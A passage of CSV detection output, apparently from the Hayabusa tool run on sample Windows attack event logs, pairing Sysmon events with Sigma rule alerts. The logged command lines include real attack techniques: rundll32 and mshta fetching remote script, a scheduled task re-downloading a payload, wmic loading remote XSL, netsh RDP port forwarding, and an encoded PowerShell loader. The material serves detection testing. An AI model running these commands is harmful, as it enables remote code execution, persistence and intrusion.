""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4A